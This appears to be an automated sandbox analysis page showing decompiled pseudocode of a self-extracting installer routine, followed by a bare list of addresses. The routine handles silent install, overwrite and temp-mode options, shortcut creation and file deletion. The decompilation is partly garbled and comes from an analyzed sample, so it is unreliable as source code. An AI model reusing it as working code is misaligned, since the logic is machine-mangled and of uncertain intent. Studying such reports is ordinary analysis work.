COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00E7C9A9(intOrPtr __ebx) {
				intOrPtr _t222;
				void* _t223;
				signed int _t287;
				void* _t290;
				signed int _t291;
				void* _t295;

				L0:
				while(1) {
					L0:
					if(__ebx != 6) {
						goto L174;
					}
					L132:
					__eax = 0;
					 *(__ebp - 0x4d08) = __ax;
					__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
					__eax = E00E86710( *(__ebp - 0x1bd58) & 0x0000ffff);
					__esi = 0x800;
					_push(0x800);
					__eflags = __eax - 0x50;
					if(__eax == 0x50) {
						_push(0xebbb82);
						__eax = __ebp - 0x4d08;
						_push(__ebp - 0x4d08);
						__eax = E00E70131();
						 *(__ebp - 0x14) = 2;
					} else {
						__eflags = __eax - 0x54;
						__eax = __ebp - 0x4d08;
						if(__eflags == 0) {
							_push(0xebab82);
							_push(__eax);
							__eax = E00E70131();
							 *(__ebp - 0x14) = 7;
						} else {
							_push(0xebcb82);
							_push(__eax);
							__eax = E00E70131();
							 *(__ebp - 0x14) = 0x10;
						}
					}
					__eax = 0;
					 *(__ebp - 0x9d58) = __ax;
					 *(__ebp - 0x3d08) = __ax;
					__ebp - 0x19d58 = __ebp - 0x6d50;
					__eax = E00E70131(__ebp - 0x6d50, __ebp - 0x19d58, __esi);
					__ebx = 0x22;
					__eflags =  *(__ebp - 0x6d50) - __bx;
					if( *(__ebp - 0x6d50) != __bx) {
						L140:
						__ebp - 0x6d50 = E00E6A373(__ebp - 0x6d50);
						__eflags = __al;
						if(__al != 0) {
							L158:
							__edi = 0x800;
							goto L159;
						}
						L141:
						__ebx = __edi;
						__esi = __ebp - 0x6d50;
						__eflags =  *(__ebp - 0x6d50) - __bx;
						if( *(__ebp - 0x6d50) == __bx) {
							goto L158;
						}
						L142:
						__ecx = 0x20;
						do {
							L143:
							__eax = __esi->i & 0x0000ffff;
							__eflags = __ax - __cx;
							if(__ax == __cx) {
								L145:
								__edi = __eax;
								__eax = 0;
								__esi->i = __ax;
								__ebp - 0x6d50 = E00E6A373(__ebp - 0x6d50);
								__eflags = __al;
								if(__al == 0) {
									L153:
									__esi->i = __di;
									L154:
									__ecx = 0x20;
									__edi = 0;
									__eflags = 0;
									goto L155;
								}
								L146:
								__ebp - 0x6d50 = E00E6A387(__ebp - 0x6d50);
								__eax = E00E6A3D5(__eax);
								__eflags = __al;
								if(__al != 0) {
									goto L153;
								}
								L147:
								__eax = 0x2f;
								__ebx = __esi;
								__eflags = __di - __ax;
								if(__di != __ax) {
									L149:
									__eax = 0x20;
									do {
										L150:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __ax;
									} while (__esi->i == __ax);
									_push(0x400);
									_push(__esi);
									__eax = __ebp - 0x3d08;
									L152:
									_push(__eax);
									__eax = E00E70131();
									 *__ebx = __di;
									goto L154;
								}
								L148:
								 *(__ebp - 0x3d08) = __ax;
								__eax =  &(__esi->i);
								_push(0x3ff);
								_push( &(__esi->i));
								__eax = __ebp - 0x3d06;
								goto L152;
							}
							L144:
							__eflags = __ax - __dx;
							if(__ax != __dx) {
								goto L155;
							}
							goto L145;
							L155:
							__esi =  &(__esi->i);
							__eflags = __esi->i - __di;
						} while (__esi->i != __di);
						__edi = 0x800;
						__eflags = __ebx;
						if(__ebx != 0) {
							__eax = 0;
							 *__ebx = __ax;
						}
						goto L159;
					} else {
						L138:
						__edi = 0x800;
						__ebp - 0x19d56 = __ebp - 0x6d50;
						E00E70131(__ebp - 0x6d50, __ebp - 0x19d56, 0x800) = __ebp - 0x6d4e;
						_push(__ebp - 0x6d4e);
						__eax = E00E8181A(__ecx);
						_pop(__ecx);
						__ecx = __ebx;
						__eflags = __eax;
						if(__eax != 0) {
							__ecx = 0;
							 *__eax = __cx;
							__ebp - 0x3d08 = E00E70131(__ebp - 0x3d08, __ebp - 0x3d08, 0x400);
						}
						L159:
						__eflags =  *((short*)(__ebp - 0x11d58));
						if( *((short*)(__ebp - 0x11d58)) != 0) {
							__ebp - 0x9d58 = __ebp - 0x11d58;
							__eax = E00E6B429(__ebp - 0x11d58, __ebp - 0x9d58, __edi);
						}
						__ebp - 0xbd58 = __ebp - 0x6d50;
						__eax = E00E6B429(__ebp - 0x6d50, __ebp - 0xbd58, __edi);
						__eflags =  *(__ebp - 0x4d08);
						if(__eflags == 0) {
							__ebp - 0x4d08 = E00E7ADBE(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14)); // executed
						}
						__ebp - 0x4d08 = E00E6B3F7(__eflags, __ebp - 0x4d08, __edi);
						__eflags =  *((short*)(__ebp - 0x17d58));
						if(__eflags != 0) {
							__ebp - 0x17d58 = __ebp - 0x4d08;
							E00E70109(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __edi) = __ebp - 0x4d08;
							__eax = E00E6B3F7(__eflags, __ebp - 0x4d08, __edi);
						}
						__ebp - 0x4d08 = __ebp - 0xcd58;
						__eax = E00E70131(__ebp - 0xcd58, __ebp - 0x4d08, __edi);
						__eflags =  *(__ebp - 0x13d58);
						__eax = __ebp - 0x13d58;
						if(__eflags == 0) {
							__eax = __ebp - 0x19d58;
						}
						__ebp - 0x4d08 = E00E70109(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __edi);
						__eax = __ebp - 0x4d08;
						__eflags = E00E6B683(__ebp - 0x4d08);
						if(__eflags == 0) {
							L169:
							__ebp - 0x4d08 = E00E70109(__eflags, __ebp - 0x4d08, L".lnk", __edi);
							goto L170;
						} else {
							L168:
							__eflags = __eax;
							if(__eflags == 0) {
								L170:
								__ebx = 0;
								__ebp - 0x4d08 = E00E6A1EF(__ecx, __ebp, __ebp - 0x4d08, 1, 0);
								__ebp - 0xbd58 = __ebp - 0xad58;
								E00E70131(__ebp - 0xad58, __ebp - 0xbd58, __edi) = __ebp - 0xad58;
								__eax = E00E6BED3(__eflags, __ebp - 0xad58);
								__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
								__eax = __ebp - 0x3d08;
								__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
								__esi = __ebp - 0xad58;
								asm("sbb ecx, ecx");
								__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
								 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
								asm("sbb eax, eax");
								__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
								 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
								__eax = __ebp - 0x15d58;
								asm("sbb edx, edx");
								E00E7A874(__ebp - 0x15d58) = __ebp - 0x4d08;
								__ebp - 0xbd58 = E00E79E3C(__ecx, 0, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08); // executed
								__eflags =  *(__ebp - 0xcd58) - __bx;
								if( *(__ebp - 0xcd58) != __bx) {
									__eax = __ebp - 0xcd58;
									SHChangeNotify(0x1000, 5, __ebp - 0xcd58, 0); // executed
								}
								while(1) {
									L174:
									_push(0x1000);
									_t210 = _t295 - 0x15; // 0xffffcae3
									_t211 = _t295 - 0xd; // 0xffffcaeb
									_t212 = _t295 - 0x3508; // 0xffff95f0
									_t213 = _t295 - 0xfd58; // 0xfffecda0
									_push( *((intOrPtr*)(_t295 + 0xc)));
									_t222 = E00E7ACC6();
									_t274 =  *((intOrPtr*)(_t295 + 0x10));
									 *((intOrPtr*)(_t295 + 0xc)) = _t222;
									if(_t222 != 0) {
										_t223 = _t295 - 0x3508;
										_t290 = _t295 - 0x1bd58;
										_t287 = 6;
										goto L2;
									} else {
										break;
									}
									L4:
									while(E00E71AC4(_t295 - 0xfd58,  *((intOrPtr*)(0xe9e618 + _t291 * 4))) != 0) {
										_t291 = _t291 + 1;
										if(_t291 < 0xe) {
											continue;
										} else {
											goto L174;
										}
									}
									__eflags = _t291 - 0xd;
									if(_t291 > 0xd) {
										continue;
									}
									L8:
									switch( *((intOrPtr*)(_t291 * 4 +  &M00E7CD65))) {
										case 0:
											L9:
											__eflags = _t274 - 2;
											if(__eflags == 0) {
												E00E7A004(_t295 - 0x7d50, 0x800);
												E00E6A690(E00E6BB55(__eflags, _t295 - 0x7d50, _t295 - 0x3508, _t295 - 0xdd58, 0x800), _t274, _t295 - 0x8d58, _t291);
												 *(_t295 - 4) = 0;
												E00E6A7CA(_t295 - 0x8d58, _t295 - 0xdd58);
												E00E67119(_t295 - 0x5d50);
												while(1) {
													L23:
													_push(0);
													_t281 = _t295 - 0x8d58;
													_t237 = E00E6A71D(_t295 - 0x8d58, _t286, _t295 - 0x5d50);
													__eflags = _t237;
													if(_t237 == 0) {
														break;
													}
													L11:
													SetFileAttributesW(_t295 - 0x5d50, 0);
													__eflags =  *(_t295 - 0x4d44);
													if(__eflags == 0) {
														L16:
														_t241 = GetFileAttributesW(_t295 - 0x5d50);
														__eflags = _t241 - 0xffffffff;
														if(_t241 == 0xffffffff) {
															continue;
														}
														L17:
														_t243 = DeleteFileW(_t295 - 0x5d50);
														__eflags = _t243;
														if(_t243 != 0) {
															continue;
														} else {
															_t293 = 0;
															_push(0);
															goto L20;
															L20:
															E00E63F8F(_t295 - 0x1108, 0x800, L"%s.%d.tmp", _t295 - 0x5d50);
															_t297 = _t297 + 0x14;
															_t248 = GetFileAttributesW(_t295 - 0x1108);
															__eflags = _t248 - 0xffffffff;
															if(_t248 != 0xffffffff) {
																_t293 = _t293 + 1;
																__eflags = _t293;
																_push(_t293);
																goto L20;
															} else {
																_t251 = MoveFileW(_t295 - 0x5d50, _t295 - 0x1108);
																__eflags = _t251;
																if(_t251 != 0) {
																	MoveFileExW(_t295 - 0x1108, 0, 4);
																}
																continue;
															}
														}
													}
													L12:
													E00E6B6E7(_t281, __eflags, _t295 - 0x7d50, _t295 - 0x1108, 0x800);
													E00E6B3F7(__eflags, _t295 - 0x1108, 0x800);
													_t294 = E00E83883(_t295 - 0x7d50);
													__eflags = _t294 - 4;
													if(_t294 < 4) {
														L14:
														_t262 = E00E6BB15(_t295 - 0x3508);
														__eflags = _t262;
														if(_t262 != 0) {
															break;
														}
														L15:
														_t265 = E00E83883(_t295 - 0x5d50);
														__eflags = 0;
														 *((short*)(_t295 + _t265 * 2 - 0x5d4e)) = 0;
														E00E7F5F0(0x800, _t295 - 0x40, 0, 0x1e);
														_t297 = _t297 + 0x10;
														 *((intOrPtr*)(_t295 - 0x3c)) = 3;
														_push(0x14);
														_pop(_t268);
														 *((short*)(_t295 - 0x30)) = _t268;
														 *((intOrPtr*)(_t295 - 0x38)) = _t295 - 0x5d50;
														_push(_t295 - 0x40);
														 *0xec2074();
														goto L16;
													}
													L13:
													_t273 = E00E83883(_t295 - 0x1108);
													__eflags = _t294 - _t273;
													if(_t294 > _t273) {
														goto L15;
													}
													goto L14;
												}
												L24:
												 *(_t295 - 4) =  *(_t295 - 4) | 0xffffffff;
												E00E6A6A6(_t295 - 0x8d58);
											}
											goto L174;
										case 1:
											L25:
											__eflags = __ebx;
											if(__ebx == 0) {
												__eax = E00E83883(__esi);
												__eax = __eax + __edi;
												_push(__eax);
												_push( *0xebdc84);
												__eax = E00E838AE(__ecx, __edx);
												__esp = __esp + 0xc;
												__eflags = __eax;
												if(__eax != 0) {
													__eax = E00E87458(__eax, __esi);
													_pop(__ecx);
													_pop(__ecx);
												}
												__eflags = __bh;
												if(__bh == 0) {
													__eax = L00E8389E(__esi);
												}
											}
											goto L174;
										case 2:
											L39:
											__eflags = __ebx;
											if(__ebx == 0) {
												__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
											}
											goto L174;
										case 3:
											L41:
											__eflags = __ebx;
											if(__ebx != 0) {
												goto L174;
											}
											L42:
											__eflags =  *0xeaa472 - __di;
											if( *0xeaa472 != __di) {
												goto L174;
											}
											L43:
											__eax = 0;
											__edi = __ebp - 0x3508;
											_push(0x22);
											 *(__ebp - 0x1108) = __ax;
											_pop(__eax);
											__eflags =  *(__ebp - 0x3508) - __ax;
											if( *(__ebp - 0x3508) == __ax) {
												__edi = __ebp - 0x3506;
											}
											__eax = E00E83883(__edi);
											__esi = 0x800;
											__eflags = __eax - 0x800;
											if(__eax >= 0x800) {
												goto L174;
											} else {
												L46:
												__eax =  *__edi & 0x0000ffff;
												_push(0x5c);
												_pop(__ecx);
												__eflags = ( *__edi & 0x0000ffff) - 0x2e;
												if(( *__edi & 0x0000ffff) != 0x2e) {
													L50:
													__eflags = __ax - __cx;
													if(__ax == __cx) {
														L62:
														__ebp - 0x1108 = E00E70131(__ebp - 0x1108, __edi, __esi);
														__ebx = 0;
														__eflags = 0;
														L63:
														_push(0x22);
														_pop(__eax);
														__eax = __ebp - 0x1108;
														__eax = E00E81A6B(__ebp - 0x1108, __ebp - 0x1108);
														_pop(__ecx);
														_pop(__ecx);
														__eflags = __eax;
														if(__eax != 0) {
															__eflags =  *(__eax + 2) - __bx;
															if( *(__eax + 2) == __bx) {
																__ecx = 0;
																__eflags = 0;
																 *__eax = __cx;
															}
														}
														__eax = __ebp - 0x1108;
														__edi = 0xeaa472;
														E00E70131(0xeaa472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
														__eax = E00E7AB60(__ebp - 0x1108, __esi); // executed
														__esi = GetDlgItem( *(__ebp + 8), 0x66);
														__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
														__eax = SendMessageW(__esi, 0x143, __ebx, 0xeaa472); // executed
														__eax = __ebp - 0x1108;
														__eax = E00E838B9(__ebp - 0x1108, 0xeaa472, __eax);
														_pop(__ecx);
														_pop(__ecx);
														__eflags = __eax;
														if(__eax != 0) {
															__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
														}
														goto L174;
													}
													L51:
													__eflags = __ax;
													if(__ax == 0) {
														L53:
														__eax = __ebp - 0x1c;
														__ebx = 0;
														__eax = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x1c);
														__eflags = __eax;
														if(__eax == 0) {
															__eax = __ebp - 0x14;
															 *(__ebp - 0x14) = 0x1000;
															_push(__ebp - 0x14);
															__eax = __ebp - 0x1108;
															_push(__ebp - 0x1108);
															__eax = __ebp - 0x20;
															_push(__ebp - 0x20);
															_push(0);
															_push(L"ProgramFilesDir");
															_push( *(__ebp - 0x1c));
															 *0xec2024() = RegCloseKey( *(__ebp - 0x1c));
															__eax =  *(__ebp - 0x14);
															__ecx = 0x7ff;
															__eax =  *(__ebp - 0x14) >> 1;
															__eflags = __eax - 0x7ff;
															if(__eax >= 0x7ff) {
																__eax = 0x7ff;
															}
															__ecx = 0;
															__eflags = 0;
															 *((short*)(__ebp + __eax * 2 - 0x1108)) = __cx;
														}
														__eflags =  *(__ebp - 0x1108) - __bx;
														if( *(__ebp - 0x1108) != __bx) {
															__eax = __ebp - 0x1108;
															__eax = E00E83883(__ebp - 0x1108);
															_push(0x5c);
															_pop(__ecx);
															__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
															if(__eflags != 0) {
																__ebp - 0x1108 = E00E70109(__eflags, __ebp - 0x1108, "\\", __esi);
															}
														}
														__esi = E00E83883(__edi);
														__eax = __ebp - 0x1108;
														__eflags = __esi - 0x7ff;
														__esi = 0x800;
														if(__eflags < 0) {
															__ebp - 0x1108 = E00E70109(__eflags, __ebp - 0x1108, __edi, 0x800);
														}
														goto L63;
													}
													L52:
													__eflags =  *((short*)(__edi + 2)) - 0x3a;
													if( *((short*)(__edi + 2)) == 0x3a) {
														goto L62;
													}
													goto L53;
												}
												L47:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
												if( *((intOrPtr*)(__edi + 2)) != __cx) {
													goto L50;
												}
												L48:
												__edi = __edi + 4;
												__ebx = 0;
												__eflags =  *__edi - __bx;
												if( *__edi == __bx) {
													goto L174;
												} else {
													__ebp - 0x1108 = E00E70131(__ebp - 0x1108, __edi, 0x800);
													goto L63;
												}
											}
										case 4:
											L68:
											__eflags =  *0xeaa46c - 1;
											__eflags = __eax - 0xeaa46c;
											 *__edi =  *__edi + __ecx;
											__eflags =  *(__ebx + 7) & __al;
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
										case 5:
											L73:
											__eax =  *(__ebp - 0x3508) & 0x0000ffff;
											__ecx = 0;
											__eax =  *(__ebp - 0x3508) & 0x0000ffff;
											__eflags = __eax;
											if(__eax == 0) {
												L80:
												 *0xea8453 = __cl;
												 *0xea8460 = 1;
												goto L174;
											}
											L74:
											__eax = __eax - 0x30;
											__eflags = __eax;
											if(__eax == 0) {
												L78:
												 *0xea8453 = __cl;
												L79:
												 *0xea8460 = __cl;
												goto L174;
											}
											L75:
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												goto L80;
											}
											L76:
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax != 0) {
												goto L174;
											}
											L77:
											 *0xea8453 = 1;
											goto L79;
										case 6:
											L86:
											__edi = 0;
											 *0xebec98 = 1;
											__edi = 1;
											__ebx = __ebp - 0x3508;
											__eflags =  *(__ebp - 0x3508) - 0x3c;
											if( *(__ebp - 0x3508) != 0x3c) {
												L97:
												__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
												if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
													L100:
													__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
													if( *((intOrPtr*)(__ebp + 0x10)) == 4) {
														__eflags = __esi - 6;
														if(__esi == 6) {
															__eax = E00E7D0DF(__ebp,  *(__ebp + 8), __ebx, __edi, 0);
														}
													}
													goto L174;
												}
												L98:
												__eflags = __esi - 9;
												if(__esi != 9) {
													goto L174;
												}
												L99:
												__eax = E00E7D0DF(__ebp,  *(__ebp + 8), __ebx, __edi, 1);
												goto L100;
											}
											L87:
											__eax = __ebp - 0x3506;
											_push(0x3e);
											_push(__ebp - 0x3506);
											__eax = E00E8181A(__ecx);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax == 0) {
												goto L97;
											}
											L88:
											_t102 = __eax + 2; // 0x2
											__ecx = _t102;
											 *(__ebp - 0x14) = _t102;
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
											__eax = __ebp - 0x108;
											_push(0x64);
											_push(__ebp - 0x108);
											__eax = __ebp - 0x3506;
											_push(__ebp - 0x3506);
											while(1) {
												L89:
												__ebx = E00E7A957();
												__eflags = __ebx;
												if(__ebx == 0) {
													break;
												}
												L90:
												__eflags =  *(__ebp - 0x108);
												if( *(__ebp - 0x108) == 0) {
													break;
												}
												L91:
												__eax = __ebp - 0x108;
												__eax = E00E71AC4(__ebp - 0x108, L"HIDE");
												__eax =  ~__eax;
												asm("sbb eax, eax");
												__edi = __edi & __eax;
												__eax = __ebp - 0x108;
												__eax = E00E71AC4(__ebp - 0x108, L"MAX");
												__eflags = __eax;
												if(__eax == 0) {
													_push(3);
													_pop(__edi);
												}
												__eax = __ebp - 0x108;
												__eax = E00E71AC4(__ebp - 0x108, L"MIN");
												__eflags = __eax;
												if(__eax == 0) {
													_push(6);
													_pop(__edi);
												}
												_push(0x64);
												__eax = __ebp - 0x108;
												_push(__ebp - 0x108);
												_push(__ebx);
											}
											L96:
											__ebx =  *(__ebp - 0x14);
											goto L97;
										case 7:
											L106:
											__eflags = __ebx - 1;
											if(__eflags != 0) {
												L123:
												__eflags = __ebx - 7;
												if(__ebx == 7) {
													__eflags =  *0xeaa46c;
													if( *0xeaa46c == 0) {
														 *0xeaa46c = 2;
													}
													 *0xea9468 = 1;
												}
												goto L174;
											}
											L107:
											__eax = __ebp - 0x7d50;
											__edi = 0x800;
											GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
											E00E6B3F7(__eflags, __ebp - 0x7d50, 0x800) = 0;
											__esi = 0;
											_push(0);
											while(1) {
												L109:
												_push( *0xe9e5f8);
												__ebp - 0x7d50 = E00E63F8F(0xea946a, __edi, L"%s%s%u", __ebp - 0x7d50);
												__eax = E00E6A373(0xea946a);
												__eflags = __al;
												if(__al == 0) {
													break;
												}
												L108:
												__esi =  &(__esi->i);
												__eflags = __esi;
												_push(__esi);
											}
											L110:
											__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xea946a);
											__eflags =  *(__ebp - 0x3508);
											if( *(__ebp - 0x3508) == 0) {
												goto L174;
											}
											L111:
											__eflags =  *0xeb6b7a;
											if( *0xeb6b7a != 0) {
												goto L174;
											}
											L112:
											__eax = 0;
											 *(__ebp - 0x1508) = __ax;
											__eax = __ebp - 0x3508;
											_push(0x2c);
											_push(__ebp - 0x3508);
											__eax = E00E8181A(__ecx);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												L119:
												__eflags =  *(__ebp - 0x1508);
												if( *(__ebp - 0x1508) == 0) {
													__ebp - 0x1bd58 = __ebp - 0x3508;
													E00E70131(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
													__ebp - 0x1508 = E00E70131(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
												}
												__ebp - 0x3508 = E00E7A782(__ebp - 0x3508);
												__eax = 0;
												 *(__ebp - 0x2508) = __ax;
												__ebp - 0x1508 = __ebp - 0x3508;
												__eax = E00E7A195( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
												__eflags = __eax - 6;
												if(__eax == 6) {
													goto L174;
												} else {
													L122:
													__eax = 0;
													__eflags = 0;
													 *0xea8450 = 1;
													 *0xea946a = __ax;
													__eax = EndDialog( *(__ebp + 8), 1);
													goto L123;
												}
											}
											L113:
											__edx = 0;
											__esi = 0;
											__eflags =  *(__ebp - 0x3508) - __dx;
											if( *(__ebp - 0x3508) == __dx) {
												goto L119;
											}
											L114:
											__ecx = 0;
											__eax = __ebp - 0x3508;
											while(1) {
												L115:
												__eflags =  *__eax - 0x40;
												if( *__eax == 0x40) {
													break;
												}
												L116:
												__esi =  &(__esi->i);
												__eax = __ebp - 0x3508;
												__ecx = __esi + __esi;
												__eax = __ebp - 0x3508 + __ecx;
												__eflags =  *__eax - __dx;
												if( *__eax != __dx) {
													continue;
												}
												L117:
												goto L119;
											}
											L118:
											__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
											__ebp - 0x1508 = E00E70131(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
											__eax = 0;
											__eflags = 0;
											 *(__ebp + __esi * 2 - 0x3508) = __ax;
											goto L119;
										case 8:
											L127:
											__eflags = __ebx - 3;
											if(__ebx == 3) {
												__eflags =  *(__ebp - 0x3508) - __di;
												if(__eflags != 0) {
													__eax = __ebp - 0x3508;
													_push(__ebp - 0x3508);
													__eax = E00E873F7(__ebx, __edi);
													_pop(__ecx);
													 *0xebec94 = __eax;
												}
												__eax = __ebp + 0xc;
												_push(__ebp + 0xc);
												 *0xebec90 = E00E7AE2A(__ecx, __edx, __eflags);
											}
											 *0xeb6b7b = 1;
											goto L174;
										case 9:
											goto L0;
										case 0xa:
											L172:
											__eflags = __ebx - 7;
											if(__ebx == 7) {
												 *0xeaa470 = 1;
											}
											goto L174;
										case 0xb:
											L81:
											__eax =  *(__ebp - 0x3508) & 0x0000ffff;
											__eax = E00E86710( *(__ebp - 0x3508) & 0x0000ffff);
											__eflags = __eax - 0x46;
											if(__eax == 0x46) {
												 *0xea8461 = 1;
											} else {
												__eflags = __eax - 0x55;
												if(__eax == 0x55) {
													 *0xea8462 = 1;
												} else {
													__eax = 0;
													 *0xea8461 = __al;
													 *0xea8462 = __al;
												}
											}
											goto L174;
										case 0xc:
											L103:
											 *0xebec99 = 1;
											__eax = __eax + 0xebec99;
											_t116 = __esi + 0x39;
											 *_t116 =  *(__esi + 0x39) + __esp;
											__eflags =  *_t116;
											__ebp = 0xffffcaf8;
											if( *_t116 != 0) {
												_t118 = __ebp - 0x3508; // 0xffff95f0
												__eax = _t118;
												_push(_t118);
												 *0xe9e5fc = E00E71AB0();
											}
											goto L174;
									}
									L2:
									_push(0x1000);
									_push(_t290);
									_push(_t223);
									_t223 = E00E7A957();
									_t290 = _t290 + 0x2000;
									_t287 = _t287 - 1;
									if(_t287 != 0) {
										goto L2;
									} else {
										_t291 = _t287;
										goto L4;
									}
								}
								L175:
								 *[fs:0x0] =  *((intOrPtr*)(_t295 - 0xc));
								return _t222;
							}
							goto L169;
						}
					}
					goto L174;
				}
			}

0x00e7c9a9
0x00e7c9a9
0x00e7c9a9
0x00e7c9ac
0x00000000
0x00000000
0x00e7c9b2
0x00e7c9b2
0x00e7c9b4
0x00e7c9bb
0x00e7c9c3
0x00e7c9c8
0x00e7c9ce
0x00e7c9cf
0x00e7c9d2
0x00e7ca07
0x00e7ca0c
0x00e7ca12
0x00e7ca13
0x00e7ca18
0x00e7c9d4
0x00e7c9d4
0x00e7c9d7
0x00e7c9dd
0x00e7c9f3
0x00e7c9f8
0x00e7c9f9
0x00e7c9fe
0x00e7c9df
0x00e7c9df
0x00e7c9e4
0x00e7c9e5
0x00e7c9ea
0x00e7c9ea
0x00e7c9dd
0x00e7ca1f
0x00e7ca21
0x00e7ca28
0x00e7ca37
0x00e7ca3e
0x00e7ca45
0x00e7ca46
0x00e7ca4d
0x00e7ca9e
0x00e7caa5
0x00e7caaa
0x00e7caac
0x00e7cb6f
0x00e7cb6f
0x00000000
0x00e7cb6f
0x00e7cab2
0x00e7cab2
0x00e7cab4
0x00e7caba
0x00e7cac1
0x00000000
0x00000000
0x00e7cac7
0x00e7cac9
0x00e7caca
0x00e7caca
0x00e7caca
0x00e7cacd
0x00e7cad0
0x00e7cada
0x00e7cada
0x00e7cadc
0x00e7cade
0x00e7cae8
0x00e7caed
0x00e7caef
0x00e7cb4b
0x00e7cb4b
0x00e7cb4e
0x00e7cb50
0x00e7cb51
0x00e7cb51
0x00000000
0x00e7cb51
0x00e7caf1
0x00e7caf8
0x00e7cafe
0x00e7cb03
0x00e7cb05
0x00000000
0x00000000
0x00e7cb07
0x00e7cb09
0x00e7cb0a
0x00e7cb0c
0x00e7cb0f
0x00e7cb29
0x00e7cb2b
0x00e7cb2c
0x00e7cb2c
0x00e7cb2c
0x00e7cb2f
0x00e7cb2f
0x00e7cb34
0x00e7cb39
0x00e7cb3a
0x00e7cb40
0x00e7cb40
0x00e7cb41
0x00e7cb46
0x00000000
0x00e7cb46
0x00e7cb11
0x00e7cb11
0x00e7cb18
0x00e7cb1b
0x00e7cb20
0x00e7cb21
0x00000000
0x00e7cb21
0x00e7cad2
0x00e7cad5
0x00e7cad8
0x00000000
0x00000000
0x00000000
0x00e7cb53
0x00e7cb53
0x00e7cb56
0x00e7cb56
0x00e7cb5f
0x00e7cb64
0x00e7cb66
0x00e7cb68
0x00e7cb6a
0x00e7cb6a
0x00000000
0x00e7ca4f
0x00e7ca4f
0x00e7ca4f
0x00e7ca5c
0x00e7ca68
0x00e7ca6f
0x00e7ca70
0x00e7ca75
0x00e7ca76
0x00e7ca77
0x00e7ca79
0x00e7ca7f
0x00e7ca81
0x00e7ca94
0x00e7ca94
0x00e7cb74
0x00e7cb74
0x00e7cb7c
0x00e7cb86
0x00e7cb8d
0x00e7cb8d
0x00e7cb9a
0x00e7cba1
0x00e7cba6
0x00e7cbae
0x00e7cbba
0x00e7cbba
0x00e7cbc7
0x00e7cbcc
0x00e7cbd4
0x00e7cbde
0x00e7cbeb
0x00e7cbf2
0x00e7cbf2
0x00e7cbff
0x00e7cc06
0x00e7cc0b
0x00e7cc13
0x00e7cc19
0x00e7cc1b
0x00e7cc1b
0x00e7cc30
0x00e7cc35
0x00e7cc41
0x00e7cc43
0x00e7cc54
0x00e7cc61
0x00000000
0x00e7cc45
0x00e7cc45
0x00e7cc50
0x00e7cc52
0x00e7cc66
0x00e7cc66
0x00e7cc72
0x00e7cc7f
0x00e7cc8b
0x00e7cc92
0x00e7cc97
0x00e7cc9e
0x00e7cca4
0x00e7ccac
0x00e7ccb2
0x00e7ccb4
0x00e7ccbd
0x00e7ccc0
0x00e7ccc2
0x00e7cccb
0x00e7ccce
0x00e7ccd4
0x00e7cce0
0x00e7ccef
0x00e7ccf4
0x00e7ccfb
0x00e7ccfe
0x00e7cd0c
0x00e7cd0c
0x00e7cd20
0x00e7cd20
0x00e7cd20
0x00e7cd25
0x00e7cd29
0x00e7cd2d
0x00e7cd34
0x00e7cd3b
0x00e7cd3e
0x00e7cd43
0x00e7cd46
0x00e7cd4b
0x00e7c0db
0x00e7c0e1
0x00e7c0e7
0x00e7c0e7
0x00000000
0x00000000
0x00000000
0x00000000
0x00e7c101
0x00e7c118
0x00e7c11c
0x00000000
0x00e7c11e
0x00000000
0x00e7c11e
0x00e7c11c
0x00e7c123
0x00e7c126
0x00000000
0x00000000
0x00e7c12c
0x00e7c12c
0x00000000
0x00e7c133
0x00e7c133
0x00e7c136
0x00e7c149
0x00e7c16f
0x00e7c183
0x00e7c186
0x00e7c191
0x00e7c2d5
0x00e7c2d5
0x00e7c2d5
0x00e7c2dd
0x00e7c2e3
0x00e7c2e8
0x00e7c2ea
0x00000000
0x00000000
0x00e7c19b
0x00e7c1a3
0x00e7c1a9
0x00e7c1af
0x00e7c255
0x00e7c25c
0x00e7c262
0x00e7c265
0x00000000
0x00000000
0x00e7c267
0x00e7c26e
0x00e7c274
0x00e7c276
0x00000000
0x00e7c278
0x00e7c278
0x00e7c27a
0x00e7c27b
0x00e7c27f
